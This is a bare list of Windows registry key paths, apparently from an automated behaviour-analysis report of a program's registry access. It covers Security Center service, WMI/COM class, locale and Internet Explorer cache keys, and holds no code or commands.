HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxSessionSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxEventSizePerSession
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\AdaptiveSQM\ManifestInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\SamplingInterval
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\SQMLogger\Start
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastEventTimeStamp
HKEY_CURRENT_USER
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Classes
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\schtasks.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater\Id
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Customer Experience Improvement Program\Uploader
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\WDM\DREDGE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ACPI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NDIS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\portcls
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\ImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\advapi32.dll[MofResourceName]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\it-IT\advapi32.dll.mui[MofResourceName]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\drivers\ACPI.sys[ACPIMOFResource]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\drivers\it-IT\ACPI.sys.mui[ACPIMOFResource]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\drivers\ndis.sys[MofResourceName]
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\KnownSvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\WMIADAP.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\net.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\net1.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\sc.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\wlrmdr.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\system\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wmi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wmi
HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\AppId
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\WmiPrvSE.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\WMI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\WMIADAP.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ThrottleDrege

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
